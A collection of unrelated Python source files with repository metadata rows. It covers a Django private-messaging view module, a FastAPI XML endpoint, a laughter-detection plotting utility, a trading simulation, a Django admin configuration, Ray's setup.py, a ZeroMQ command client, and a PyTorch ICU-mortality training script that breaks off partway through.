from django.template import RequestContext
from django.contrib.auth.decorators import login_required
from django.views.generic import View
from django.utils.decorators import method_decorator
from django.http import (
JsonResponse
)
from django.core import serializers
from second.models import Message
class AddMessageView(View):
    """Create a private message from the authenticated user to another user."""

    @method_decorator(login_required)
    def dispatch(self, request, *args, **kwargs):
        # Require authentication for every HTTP method on this view.
        return super(AddMessageView, self).dispatch(request, *args, **kwargs)

    def post(self, request, *args, **kwargs):
        """Save a message; expects POST params 'to' (username) and 'text'."""
        new_msg = Message()
        new_msg.from_user = request.user
        # Narrowed from a bare `except:`: only a missing 'to' parameter or an
        # unknown recipient should produce this error response; any other
        # failure must surface instead of being silently swallowed.
        try:
            to_user = User.objects.get(username=request.POST['to'])
        except (KeyError, User.DoesNotExist):
            response = {'success':False, 'msg':'To user does not exist'}
            return JsonResponse(response)
        new_msg.to_user = to_user
        new_msg.text = request.POST['text']
        new_msg.save()
        return JsonResponse({'success':True, 'msg':"message successfully sent"})
class GetAllMessages(View):
    """Return the full conversation between the authenticated user and the
    user named in the 'user' GET parameter, newest message first."""

    @method_decorator(login_required)
    def dispatch(self, request, *args, **kwargs):
        # Require authentication for every HTTP method on this view.
        return super(GetAllMessages, self).dispatch(request, *args, **kwargs)

    def get(self, request, *args, **kwargs):
        user = request.user
        username = request.GET['user']
        # Narrowed from a bare `except:` so that only an unknown username
        # yields the friendly error; other failures must surface.
        try:
            other_user = User.objects.get(username=username)
        except User.DoesNotExist:
            response = {'success':False, 'msg': 'User does not exist'}
            return JsonResponse(response)
        # Collect both directions of the conversation and sort newest first.
        msgs = list(Message.objects.filter(from_user=user, to_user=other_user))
        msgs += list(Message.objects.filter(from_user=other_user, to_user=user))
        msgs.sort(key=lambda x: x.time, reverse=True)
        all_msgs = [msg.to_dict() for msg in msgs]
        return JsonResponse(all_msgs, safe=False)
class GetAllUsers(View):
    """List every user the authenticated user has exchanged messages with."""

    @method_decorator(login_required)
    def dispatch(self, request, *args, **kwargs):
        # Require authentication for every HTTP method on this view.
        return super(GetAllUsers, self).dispatch(request, *args, **kwargs)

    def get(self, request, *args, **kwargs):
        user = request.user
        # Gather unique conversation partners from both message directions.
        partners = set()
        for msg in Message.objects.filter(from_user=user):
            partners.add(msg.to_user)
        for msg in Message.objects.filter(to_user=user):
            partners.add(msg.from_user)
        users = [{"username": partner.username, "name":
                  partner.first_name+" "+partner.last_name} for partner in partners]
        return JsonResponse(users, safe=False)
| sanjayramesh005/chat-app | second/views.py | views.py | py | 2,958 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "django.views.generic.View",
"line_number": 18,
"usage_type": "name"
},
{
"api_name": "django.utils.decorators.method_decorator",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "django.contrib.auth.decorators.login_required",
"line_number": 20,
"us... |
4492425254 | import xml.etree.ElementTree as ET
from fastapi import FastAPI, Path
from fastapi.responses import Response
app = FastAPI()
@app.get("/IF01/{name}")
async def get(
    name: str = Path(title="名前"),
):
    """Build a small legacy-style XML payload for the given name and return
    it encoded as Shift-JIS (``application/xml; charset=shift_jis``).

    Every value except the name is hard-coded sample data.
    """
    root = ET.Element("root")
    # "Numbered tags" (DT0001, DT0002, ...) -- an awful legacy naming scheme
    # this endpoint deliberately reproduces.
    nameElement = ET.SubElement(root, "DT0001")
    nameElement.text = name
    birthday = ET.SubElement(root, "DT0002")
    birthday.text = "19700101"  # fixed sample birthday (YYYYMMDD)
    address = ET.SubElement(root, "DT0003")
    address.text = "神奈川県横浜市以下略"
    gender = ET.SubElement(root, "DT0004")
    gender.text = "1"  # fixed sample gender code
    xml_data = ET.tostring(root, encoding="shift_jis", xml_declaration=True)
    response = Response(content=xml_data, media_type="application/xml; charset=shift_jis")
    return response
| ikemo3/conveni-pdf-example | terrible-api/src/main.py | main.py | py | 809 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "fastapi.FastAPI",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "fastapi.Path",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "xml.etree.ElementTree.Element",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "xml.etree.E... |
35428259157 | import pickle
from typing import List, Tuple
import matplotlib.pyplot as plt
import matplotlib.patches as mpatches
def _draw_track(segment_list, level, color, t_min, t_max, zoom):
    """Draw one horizontal track of segments at height ``level``.

    Segments are thick colored lines, gaps between them are thin dashed black
    lines; with ``zoom`` each segment also gets dashed vertical edges and a
    translucent fill. Assumes ``segment_list`` is non-empty (the original code
    had the same requirement).
    """
    prev_end = t_min
    for x_min, x_max in segment_list:
        if zoom:
            plt.vlines(x_min, 1, 2, color=color, linestyles="dashed")
            plt.vlines(x_max, 1, 2, color=color, linestyles="dashed")
            plt.fill_between([x_min, x_max], 1, 2, color=color, alpha=0.1)
        plt.hlines(
            level,
            prev_end,
            x_min,
            color="black",
            linewidth=2,
            linestyles="dashed",
        )
        plt.hlines(level, x_min, x_max, color=color, linewidth=4)
        prev_end = x_max
    # Trailing gap from the last segment to the end of the window.
    plt.hlines(
        level, x_max, t_max, color="black", linewidth=2, linestyles="dashed"
    )


def plot_segments(
    true_segment_list: List[Tuple[float, float]],
    pred_segment_list: List[Tuple[float, float]],
    t_min: float = None,
    t_max: float = None,
    zoom: bool = True,
    marker_list: List[int] = None,
):
    """Display true and predicted timecodes on a common timeline.

    Groundtruth segments are drawn in red at level 1, predictions in blue at
    level 2. Fixed: the legend previously paired each label with the color of
    the *other* track.

    :param true_segment_list: list of groundtruth timecodes.
    :param pred_segment_list: list of predicted timecodes.
    :param t_min: timecode from which starting the timeline.
    :param t_max: timecode to which ending the timeline.
    :param zoom: whether to display the diagram in a "zoom" fashion or not
        (ie: with details, the timeline should be short).
    :param marker_list: list of markers to add on the diagram (gray lines).
    """
    true_segment_list = sorted(true_segment_list)
    pred_segment_list = sorted(pred_segment_list)
    x_max = max(true_segment_list[-1][-1], pred_segment_list[-1][-1])
    # NOTE: a falsy t_min/t_max (0 or None) falls back to the defaults.
    t_min = 0 if not t_min else t_min
    t_max = x_max if not t_max else t_max
    # Keep only the segments fully inside the displayed window.
    true_segment_list = [
        [t1, t2]
        for t1, t2 in true_segment_list
        if (t1 >= t_min) and (t2 <= t_max)
    ]
    pred_segment_list = [
        [t1, t2]
        for t1, t2 in pred_segment_list
        if (t1 >= t_min) and (t2 <= t_max)
    ]
    plt.figure(figsize=(20, 5))
    _draw_track(true_segment_list, 1, "#e41a1c", t_min, t_max, zoom)
    _draw_track(pred_segment_list, 2, "#377eb8", t_min, t_max, zoom)
    if marker_list is not None:
        marker_list = [t for t in marker_list if (t >= t_min) and (t <= t_max)]
        for timecode in marker_list:
            plt.vlines(timecode, 1, 2, color="#000000")
    # Legend colors now match the tracks drawn above (red=true, blue=pred).
    pred_legend = mpatches.Patch(color="#377eb8", label="pred")
    true_legend = mpatches.Patch(color="#e41a1c", label="true")
    plt.legend(handles=[pred_legend, true_legend], loc=6)
    plt.show()
def load_labels(label_path: str) -> List[Tuple[float, float]]:
    """Load a Friends label file and extract laughter timecodes.

    :param label_path: path to a pickled dict whose values are segments of the
        form ``[start, end, ..., annotation_string]``.
    :return: sorted ``[start, end]`` pairs of the segments whose annotation
        string contains "laughter" at character positions [-10:-2].
    """
    # Fixed: open the file in a context manager so the handle is closed
    # (the original leaked it via pickle.load(open(...))).
    with open(label_path, "rb") as f:
        labels = pickle.load(f)
    true_timecodes = []
    for segment in labels.values():
        # The label keyword sits 2 characters before the end of the
        # annotation string; comparison is case-insensitive.
        if segment[-1][-10:-2].lower() == "laughter":
            true_timecodes.append(segment[:2])
    return sorted(true_timecodes)
def load_preds(pred_path: str) -> List[Tuple[float, float]]:
    """Load a prediction file with laughter timecodes.

    :param pred_path: path to a pickled iterable of timecode pairs.
    :return: the timecodes, sorted.
    """
    # Fixed: close the file deterministically instead of leaking the handle.
    with open(pred_path, "rb") as f:
        preds = pickle.load(f)
    return sorted(preds)
| robincourant/FunnyNet | laughter_detection/core/utils.py | utils.py | py | 3,805 | python | en | code | 1 | github-code | 6 | [
{
"api_name": "typing.List",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "typing.Tuple",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "typing.List",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "typing.Tuple",
"line_number": ... |
6998246271 | from csv import DictReader
from glob import glob
from random import choices
from datetime import date
import numpy as np
import matplotlib.pyplot as plt
from statistics import mean
from dataclasses import dataclass
'''
for traders with less than 25k in their brokerage accounts, three day trades are allowed per five day rolling period
this means, in effect, that three day trades are allowed per week as long as they are performed on the same days each week
Which days?
I will rule out Mondays since many market holidays fall on Mondays
The number of market holidays falling on each day are:
Monday: 19
Tuesday: 1
Wednesday: 2
Thursday: 3
Friday: 3
So, Tuesdays and Wednesdays are in.
Fridays have shortened days each November on black friday.
So, if day trading on exactly the same three weekdays each week, it seems that Tuesday, Wednesday, and Thursday are optimal.
For traders with 25k or more in their brokerage accounts, it would seem that there is no limitation on number of day trades.
'''
csv_files = glob('./data-files/**/*.csv')
quotes = {}
@dataclass
class Quote:
    # One daily price bar for a symbol (the low is deliberately not stored;
    # the simulation below only needs open, high and close).
    open_price: float   # opening price for the session
    high_price: float   # intraday high
    close_price: float  # closing price
    trade_date: date    # calendar date of the session
# Load per-symbol quotes, keeping only Tuesday/Wednesday/Thursday sessions
# (weekday() in (1, 2, 3)) per the day-trading rationale in the header.
for csv_file in csv_files:
    with open(csv_file, newline='') as f:
        quote_reader = DictReader(f)
        quote = []
        for row in quote_reader:
            trade_date = date.fromisoformat(row['Date'])
            if trade_date.weekday() in (1, 2, 3):
                try:
                    quote.append(Quote(float(row['Open']), float(row['High']), float(row['Close']), trade_date))
                except:
                    # Malformed row (e.g. non-numeric price): report and skip.
                    print(csv_file)
                    print(row)
        # Only symbols with exactly 155 qualifying sessions are simulated,
        # so every symbol covers the same trading window.
        if (len(quote) != 155):
            print(csv_file)
            print(len(quote))
        else:
            # Key by the symbol extracted from the Windows-style file path.
            quotes[csv_file.split('.')[1].split('\\')[2]] = quote
# sample_symbol = 'INDB'
trading_days = 155
simulation_size = 500000
# targets = [{ 'target': 1.005 + 0.0000005 * i, 'running total': [1000.0 for _ in range(simulation_size)] } for i in range(10000)]
# print(len([quotes[equity] for equity in quotes.keys()]))
# Each simulated trader starts with $1000 and buys a random symbol at the
# open every trading day, selling at a fixed percentage target (or the close
# if the target is never reached intraday).
running_totals = [1000.0 for _ in range(simulation_size)]
target = 1.008778
print(len(quotes.keys()))
for i in range(trading_days):
    equities = choices([key for key in quotes.keys()], k=simulation_size)
    for (j, equity) in enumerate(equities):
        quote = quotes[equity][i]
        entry_price = quote.open_price
        position_entry_shares = running_totals[j] / entry_price
        target_price = entry_price * target
        if target_price <= quote.high_price:
            # Target reached intraday: exit at the target price.
            position_exit = position_entry_shares * target_price
        else:
            # Otherwise exit at the close.
            position_exit = position_entry_shares * quote.close_price
        if position_exit > 500:
            # regulatory transaction fee
            position_exit -= position_exit * 22.9 / 1000000.0
        if position_entry_shares > 50:
            # trading activity fee
            position_exit -= 0.00013 * position_entry_shares
        running_totals[j] = position_exit
# print(sorted(running_totals))
# Histogram of terminal account values across the simulated traders.
print(f'less than 700: {len([x for x in running_totals if x < 700])}')
print(f'at least 700 and less than 800: {len([x for x in running_totals if x >= 700 and x < 800])}')
print(f'at least 800 and less than 900: {len([x for x in running_totals if x >= 800 and x < 900])}')
print(f'at least 900 and less than 1000: {len([x for x in running_totals if x >= 900 and x < 1000])}')
print(f'at least 1000 and less than 1100: {len([x for x in running_totals if x >= 1000 and x < 1100])}')
print(f'at least 1100 and less than 1200: {len([x for x in running_totals if x >= 1100 and x < 1200])}')
print(f'at least 1200 and less than 1300: {len([x for x in running_totals if x >= 1200 and x < 1300])}')
print(f'at least 1300 and less than 1400: {len([x for x in running_totals if x >= 1300 and x < 1400])}')
print(f'at least 1400: {len([x for x in running_totals if x >= 1400])}')
'''
x = [st['target'] for st in targets]
y = [mean(st['running total']) for st in targets]
plt.scatter(x, y)
plt.show()
'''
| joshparkerj/day-trader | simulate.py | simulate.py | py | 3,898 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "glob.glob",
"line_number": 37,
"usage_type": "call"
},
{
"api_name": "datetime.date",
"line_number": 46,
"usage_type": "name"
},
{
"api_name": "dataclasses.dataclass",
"line_number": 41,
"usage_type": "name"
},
{
"api_name": "csv.DictReader",
"l... |
19271398173 | # coding=utf-8
from __future__ import unicode_literals
from django.contrib import admin
from django.http import HttpResponseRedirect
from django.conf.urls import url
from django.utils.html import format_html
from django.core.urlresolvers import reverse
from ordered_model.admin import OrderedModelAdmin
from monitoreo.apps.dashboard.models import IndicatorType, TableColumn
from monitoreo.apps.dashboard.admin.utils import switch
@admin.register(TableColumn)
class TableColumnAdmin(OrderedModelAdmin):
    """Admin for TableColumn rows: shows the column name plus the
    move-up/move-down reordering links provided by OrderedModelAdmin."""
    list_display = ('full_name', 'move_up_down_links')
@admin.register(IndicatorType)
class IndicatorTypeAdmin(OrderedModelAdmin):
    """Admin for IndicatorType rows.

    Exposes bulk actions (built with ``switch``) that flip the boolean flags
    controlling where each indicator appears -- summary, report, the three
    time-series groups and the three dashboard panels -- plus custom
    move-to-top / move-to-bottom ordering links."""
    list_display = ('nombre', 'order', 'resumen', 'mostrar',
                    'series_red', 'series_nodos', 'series_federadores',
                    'panel_red', 'panel_nodos', 'panel_federadores',
                    'move_up_down_links', 'position_actions')
    list_filter = ('resumen', 'mostrar')
    # NOTE(review): 'queryset_to_top'/'queryset_to_bottom' are not defined in
    # this file -- presumably provided elsewhere (e.g. a base class); verify.
    actions = ('queryset_to_top', 'queryset_to_bottom',
               'summarize', 'desummarize',
               'show', 'hide',
               'add_to_aggregated_series', 'remove_from_aggregated_series',
               'add_to_nodes_series', 'remove_from_nodes_series',
               'add_to_indexing_series', 'remove_from_indexing_series',
               'add_to_aggregated_panel', 'remove_from_aggregated_panel',
               'add_to_nodes_panel', 'remove_from_nodes_panel',
               'add_to_federators_panel', 'remove_from_federators_panel'
               )

    def get_urls(self):
        # Add the /<id>/top/ and /<id>/bottom/ endpoints used by the
        # "Tope"/"Fondo" buttons rendered by position_actions.
        urls = super(IndicatorTypeAdmin, self).get_urls()
        extra_urls = [url(r'^(?P<model_id>.+)/(?P<direction>top|bottom)/$',
                          self.order_move, name='order_move'), ]
        return extra_urls + urls

    def position_actions(self, obj):
        # Render the per-row "move to top"/"move to bottom" buttons.
        return format_html(
            '<a class="button" href="{}">Tope</a> '
            '<a class="button" href="{}">Fondo</a>',
            reverse('admin:order_move', args=[obj.pk, 'top']),
            reverse('admin:order_move', args=[obj.pk, 'bottom']),
        )
    position_actions.short_description = 'Posicionamientos'
    position_actions.allow_tags = True

    def order_move(self, request, model_id, direction):
        # Handle the endpoints registered in get_urls: move the indicator to
        # the top or bottom of the ordering, then return to the referrer.
        indicator_type = IndicatorType.objects.get(pk=model_id)
        if direction == 'top':
            indicator_type.top()
        elif direction == 'bottom':
            indicator_type.bottom()
        indicator_type.save()
        return HttpResponseRedirect(request.META.get('HTTP_REFERER'))

    # Bulk flag-toggling actions; ``switch`` returns an admin action that sets
    # the given field(s) on every selected row.
    summarize = switch({'resumen': True})
    summarize.short_description = 'Agregar al resumen'
    desummarize = switch({'resumen': False})
    desummarize.short_description = 'Quitar del resumen'

    show = switch({'mostrar': True})
    show.short_description = 'Agregar al reporte'
    hide = switch({'mostrar': False})
    hide.short_description = 'Quitar del reporte'

    add_to_aggregated_series = switch({'series_red': True})
    add_to_aggregated_series.short_description =\
        'Agregar a las series de tiempo de red'
    remove_from_aggregated_series = switch({'series_red': False})
    remove_from_aggregated_series.short_description =\
        'Quitar de las series de tiempo de red'

    add_to_nodes_series = switch({'series_nodos': True})
    add_to_nodes_series.short_description = \
        'Agregar a las series de tiempo de nodos'
    remove_from_nodes_series = switch({'series_nodos': False})
    remove_from_nodes_series.short_description = \
        'Quitar de las series de tiempo de nodos'

    add_to_indexing_series = switch({'series_federadores': True})
    add_to_indexing_series.short_description = \
        'Agregar a las series de tiempo de nodos federadores'
    remove_from_indexing_series = switch({'series_federadores': False})
    remove_from_indexing_series.short_description = \
        'Quitar de las series de tiempo de nodos federadores'

    add_to_aggregated_panel = switch({'panel_red': True})
    add_to_aggregated_panel.short_description = \
        'Agregar al panel de indicadores de red'
    remove_from_aggregated_panel = switch({'panel_red': False})
    remove_from_aggregated_panel.short_description = \
        'Quitar del panel de indicadores de red'

    add_to_nodes_panel = switch({'panel_nodos': True})
    add_to_nodes_panel.short_description = \
        'Agregar al panel de indicadores de nodos'
    remove_from_nodes_panel = switch({'panel_nodos': False})
    remove_from_nodes_panel.short_description = \
        'Quitar del panel de indicadores de nodos'

    add_to_federators_panel = switch({'panel_federadores': True})
    add_to_federators_panel.short_description = \
        'Agregar al panel de indicadores de nodos federadores'
    remove_from_federators_panel = switch({'panel_federadores': False})
    remove_from_federators_panel.short_description = \
        'Quitar del panel de indicadores de nodos federadores'
| datosgobar/monitoreo-apertura | monitoreo/apps/dashboard/admin/indicator_types.py | indicator_types.py | py | 4,952 | python | en | code | 5 | github-code | 6 | [
{
"api_name": "ordered_model.admin.OrderedModelAdmin",
"line_number": 17,
"usage_type": "name"
},
{
"api_name": "django.contrib.admin.register",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "monitoreo.apps.dashboard.models.TableColumn",
"line_number": 16,
"usa... |
18227651268 |
from flask import Flask, render_template, session, request, url_for, redirect, flash
app = Flask(__name__)
@app.route("/")
def hello():
    """Render the home page; also logs a greeting to stdout for debugging."""
    print ("hello there")
    return render_template("home.html")

if __name__ == "__main__":
    # Development server with the debugger enabled; not for production use.
    app.debug = True
    app.run()
| TimMarder/determinants--marderT_canaleB_liuA_hasanA | app.py | app.py | py | 269 | python | en | code | 2 | github-code | 6 | [
{
"api_name": "flask.Flask",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "flask.render_template",
"line_number": 9,
"usage_type": "call"
}
] |
38679091876 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import shutil
import subprocess
import sys
from setuptools import setup, find_packages, Distribution
import setuptools.command.build_ext as _build_ext
# Ideally, we could include these files by putting them in a
# MANIFEST.in or using the package_data argument to setup, but the
# MANIFEST.in gets applied at the very beginning when setup.py runs
# before these files have been created, so we have to move the files
# manually.
# Native binaries and assets that must always ship inside the wheel.
ray_files = [
    "ray/core/src/common/thirdparty/redis/src/redis-server",
    "ray/core/src/common/redis_module/libray_redis_module.so",
    "ray/core/src/plasma/plasma_store",
    "ray/core/src/plasma/plasma_manager",
    "ray/core/src/local_scheduler/local_scheduler",
    "ray/core/src/local_scheduler/liblocal_scheduler_library.so",
    "ray/core/src/global_scheduler/global_scheduler",
    "ray/WebUI.ipynb"
]

# Files whose absence is tolerated at packaging time (see build_ext.run).
optional_ray_files = []

ray_ui_files = [
    "ray/core/src/catapult_files/index.html",
    "ray/core/src/catapult_files/trace_viewer_full.html"
]

ray_autoscaler_files = [
    "ray/autoscaler/aws/example-full.yaml"
]

# The UI files are mandatory if the INCLUDE_UI environment variable equals 1.
# Otherwise, they are optional.
if "INCLUDE_UI" in os.environ and os.environ["INCLUDE_UI"] == "1":
    ray_files += ray_ui_files
else:
    optional_ray_files += ray_ui_files

optional_ray_files += ray_autoscaler_files

# Extra pip dependency groups, e.g. `pip install ray[rllib]`.
extras = {
    "rllib": [
        "tensorflow", "pyyaml", "gym[atari]", "opencv-python",
        "python-snappy", "scipy"]
}
class build_ext(_build_ext.build_ext):
    """Custom build step: runs the top-level build.sh, then copies the native
    binaries, bundled pyarrow files and generated flatbuffer bindings into the
    build tree so they ship inside the wheel."""
    def run(self):
        # Note: We are passing in sys.executable so that we use the same
        # version of Python to build pyarrow inside the build.sh script. Note
        # that certain flags will not be passed along such as --user or sudo.
        # TODO(rkn): Fix this.
        subprocess.check_call(["../build.sh", sys.executable])

        # We also need to install pyarrow along with Ray, so make sure that the
        # relevant non-Python pyarrow files get copied.
        pyarrow_files = [
            os.path.join("ray/pyarrow_files/pyarrow", filename)
            for filename in os.listdir("./ray/pyarrow_files/pyarrow")
            if not os.path.isdir(os.path.join("ray/pyarrow_files/pyarrow",
                                              filename))]

        files_to_include = ray_files + pyarrow_files

        for filename in files_to_include:
            self.move_file(filename)
        # Copy over the autogenerated flatbuffer Python bindings.
        generated_python_directory = "ray/core/generated"
        for filename in os.listdir(generated_python_directory):
            if filename[-3:] == ".py":
                self.move_file(os.path.join(generated_python_directory,
                                            filename))

        # Try to copy over the optional files; failures are tolerated because
        # these artifacts may legitimately be absent from a given build.
        for filename in optional_ray_files:
            try:
                self.move_file(filename)
            except Exception as e:
                print("Failed to copy optional file {}. This is ok."
                      .format(filename))

    def move_file(self, filename):
        # TODO(rkn): This feels very brittle. It may not handle all cases. See
        # https://github.com/apache/arrow/blob/master/python/setup.py for an
        # example.
        source = filename
        destination = os.path.join(self.build_lib, filename)
        # Create the target directory if it doesn't already exist.
        parent_directory = os.path.dirname(destination)
        if not os.path.exists(parent_directory):
            os.makedirs(parent_directory)
        print("Copying {} to {}.".format(source, destination))
        shutil.copy(source, destination)
class BinaryDistribution(Distribution):
    """Distribution that always reports extension modules, forcing setuptools
    to build a platform-specific (non-pure) wheel."""
    def has_ext_modules(self):
        return True
# Package metadata; distclass/cmdclass hook in the custom build steps above.
setup(name="ray",
      # The version string is also in __init__.py. TODO(pcm): Fix this.
      version="0.3.1",
      packages=find_packages(),
      cmdclass={"build_ext": build_ext},
      # The BinaryDistribution argument triggers build_ext.
      distclass=BinaryDistribution,
      install_requires=["numpy",
                        "funcsigs",
                        "click",
                        "colorama",
                        "psutil",
                        "pytest",
                        "pyyaml",
                        "redis",
                        # The six module is required by pyarrow.
                        "six >= 1.0.0",
                        "flatbuffers"],
      setup_requires=["cython >= 0.23"],
      extras_require=extras,
      entry_points={"console_scripts": ["ray=ray.scripts.scripts:main"]},
      include_package_data=True,
      zip_safe=False,
      license="Apache 2.0")
| ray-project/sandbox | python/setup.py | setup.py | py | 4,842 | python | en | code | 4 | github-code | 6 | [
{
"api_name": "os.environ",
"line_number": 42,
"usage_type": "attribute"
},
{
"api_name": "setuptools.command.build_ext.build_ext",
"line_number": 56,
"usage_type": "attribute"
},
{
"api_name": "setuptools.command.build_ext",
"line_number": 56,
"usage_type": "name"
},
... |
42688926971 | import logging
import time
import uuid
from queue import Queue
from threading import Event, Thread
import zmq
class ControlClient(Thread):
    """Worker thread that forwards queued commands to a ZeroMQ REQ socket on
    localhost and stores the replies keyed by command id.

    NOTE(review): ``self.active`` is never set inside this class, so the run()
    loop exits immediately unless the caller sets ``active`` before
    start() -- confirm against the call sites.
    """
    def __init__(self, port: int):
        # port: TCP port of the control server on localhost.
        super(ControlClient, self).__init__()
        self.daemon = True
        self.command_queue = Queue()          # pending [id, device, cmd, args, kwargs]
        self.command_return = {}              # command id -> reply
        self.command_return_popque = Queue()  # ids whose replies should be dropped
        self.context = zmq.Context()
        self.socket = self.context.socket(zmq.REQ)
        self.port = port
        self.timeout = 5000                   # poll timeout in milliseconds
        self.active = Event()
    def execute_command(self, device, command, args, kwargs, id=None):
        """Send one command over the socket and return the reply value.

        Returns "Error" when the server reports a failure, and implicitly
        returns None when no reply arrives within the timeout.
        """
        self.socket.send_json([device, command, args, kwargs])
        if (self.socket.poll(self.timeout) & zmq.POLLIN) != 0:
            status, retval = self.socket.recv_json()
            if status == "OK":
                return retval
            else:
                logging.warning(
                    f"{device} networking warning in "
                    + f"ExecuteNetworkCommand : error for {command} -> {retval}"
                )
                return "Error"
    def run(self):
        """Main loop: drain the command queue, publish replies, drop replies
        whose ids were scheduled for removal."""
        self.socket.connect(f"tcp://localhost:{self.port}")
        while self.active.is_set():
            while not self.command_queue.empty():
                id, device, command, args, kwargs = self.command_queue.get()
                ret = self.execute_command(device, command, args, kwargs)
                self.command_return[id] = ret
            while not self.command_return_popque.empty():
                self.command_return.pop(self.command_return_popque.get())
            time.sleep(1e-6)
def send_command(
    control_client: ControlClient, device, command, args, kwargs, wait_return=False
):
    """Queue a command for the ControlClient worker thread.

    When ``wait_return`` is True, busy-wait until the worker publishes the
    reply and return it; otherwise schedule the reply for disposal and return
    immediately.
    """
    # 64-bit command id derived from a time-based UUID.
    command_id = uuid.uuid1().int >> 64
    control_client.command_queue.put([command_id, device, command, args, kwargs])
    if not wait_return:
        # Caller does not want the result; have the worker discard it.
        control_client.command_return_popque.put(command_id)
        return
    # Block until the worker publishes the return value for our id.
    while command_id not in control_client.command_return:
        time.sleep(1e-6)
    return control_client.command_return.pop(command_id)
| ograsdijk/CeNTREX-compressorcabinet | centrex_compressorcabinet/networking/controller_client.py | controller_client.py | py | 2,107 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "threading.Thread",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "queue.Queue",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "queue.Queue",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "zmq.Context",
"line_numb... |
16179638713 | import os
import torch
import wandb
import argparse
import numpy as np
import pandas as pd
from sklearn.model_selection import StratifiedKFold
from sklearn.experimental import enable_iterative_imputer
from sklearn.impute import IterativeImputer
from sklearn.preprocessing import StandardScaler
from sklearn.metrics import confusion_matrix, roc_auc_score, average_precision_score, balanced_accuracy_score
os.environ["CUDA_DEVICE_ORDER"] = 'PCI_BUS_ID'
os.environ["CUDA_VISIBLE_DEVICES"] = '0'
def parse_args():
    """Parse the hyperparameter command-line arguments.

    All arguments are required; the declared ``default`` values are never
    used because argparse ignores them when ``required=True``.

    Returns:
        argparse.Namespace with the three hidden-layer sizes, learning rate,
        weight decay, momentum and number of epochs.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument(
        '--layer_1', help='layer 1 size', type=int, default=50, required=True)
    parser.add_argument(
        '--layer_2', help='layer 2 size', type=int, default=50, required=True)
    parser.add_argument(
        '--layer_3', help='layer 3 size', type=int, default=50, required=True)
    parser.add_argument(
        '--lr', help='Learning Rate', type=float, default=0.01, required=True)
    parser.add_argument(
        '--weight_decay', help='Weight Decay', type=float, default=0.9, required=True)
    # Fixed copy-paste bug: this help text previously read 'Weight Decay'.
    parser.add_argument(
        '--momentum', help='Momentum', type=float, default=0.9, required=True)
    parser.add_argument(
        '--no_epoch', help='Number of Epochs', type=int, default=1000, required=True)
    args = parser.parse_args()
    return args
class Model(torch.nn.Module):
    """Feed-forward mortality classifier head.

    Maps 12 input features through three SELU-activated hidden layers to a
    single raw logit per sample (apply sigmoid externally).
    """

    def __init__(self, layer_1, layer_2, layer_3):
        super(Model, self).__init__()
        # Attribute names kept stable so existing state dicts stay loadable.
        self.lin1 = torch.nn.Linear(12, layer_1)
        self.lin2 = torch.nn.Linear(layer_1, layer_2)
        self.lin3 = torch.nn.Linear(layer_2, layer_3)
        self.lin4 = torch.nn.Linear(layer_3, 1)
        self.selu = torch.nn.SELU()

    def forward(self, x):
        """Return logits of shape (batch, 1) for input of shape (batch, 12)."""
        hidden = self.selu(self.lin1(x))
        hidden = self.selu(self.lin2(hidden))
        hidden = self.selu(self.lin3(hidden))
        return self.lin4(hidden)
def load_data():
    """Load the eICU and MIMIC cohorts, align their feature columns and
    stack them into a single dataset.

    Returns:
        x: array of shape (n_patients, 12) with possibly-missing values
           (imputation happens downstream).
        y: label array (eICU 'actualicumortality' then MIMIC 'Mortality').
    """
    cd = os.getcwd()
    # Fixed: paths were previously built as cd + '../data/...' without a
    # separator, yielding broken paths like '/cwd..data/x_eicu.csv'.
    data_dir = os.path.join(cd, '..', 'data')
    x_eicu = pd.read_csv(os.path.join(data_dir, 'x_eicu.csv'))
    y_eicu = pd.read_csv(os.path.join(data_dir, 'y_eicu.csv'))
    mimic = pd.read_csv(os.path.join(data_dir, 'mimic.csv'))
    # Sanity check: feature and label rows must describe the same ICU stays.
    assert np.all(x_eicu['patientunitstayid'].to_numpy() == y_eicu['patientunitstayid'].to_numpy())
    feature_list = ['lactate', 'oobventday1', 'eyes', 'motor', 'verbal', 'albumin_x',
                    'age', 'creatinine_x', 'BUN', 'PT - INR', 'WBC x 1000', 'meanbp']
    # MIMIC column names for the same clinical variables, in the same order.
    feature_list_mimic = ['Lactate', 'firstdayvent', 'gcseyes', 'gcsmotor', 'gcsverbal', 'Albumin',
                          'Age', 'Creatinine', 'BUN', 'INR', 'WBC', 'MAP']
    x_eicu = x_eicu[feature_list].to_numpy()
    y_eicu = y_eicu['actualicumortality'].to_numpy()
    x_mimic = mimic[feature_list_mimic].to_numpy()
    y_mimic = mimic['Mortality'].to_numpy()
    x = np.vstack((x_eicu, x_mimic))
    y = np.hstack((y_eicu, y_mimic))
    return x, y
def main():
    """Run 10-fold cross-validated training of the mortality model on GPU and
    log the pooled out-of-fold metrics to Weights & Biases."""
    wandb.init(project='mortality-tool-newfeats')
    args = parse_args()
    x, y = load_data()
    kfold = StratifiedKFold(n_splits=10)
    logits_all = []
    labels_all = []
    counter = 1
    for train_index, test_index in kfold.split(x, y):
        x_train, y_train = x[train_index], y[train_index]
        x_test, y_test = x[test_index], y[test_index]
        # Impute and scale with statistics fit on the training fold only,
        # avoiding leakage into the held-out fold.
        imputer = IterativeImputer()
        scaler = StandardScaler()
        x_train = scaler.fit_transform(imputer.fit_transform(x_train))
        x_test = scaler.transform(imputer.transform(x_test))
        x_train, y_train = torch.from_numpy(x_train).float().to('cuda:0'), torch.from_numpy(y_train).float().to('cuda:0')
        model = Model(args.layer_1, args.layer_2, args.layer_3)
        # pos_weight counters class imbalance (presumably ~14.8 negatives per
        # positive -- TODO confirm against the cohort statistics).
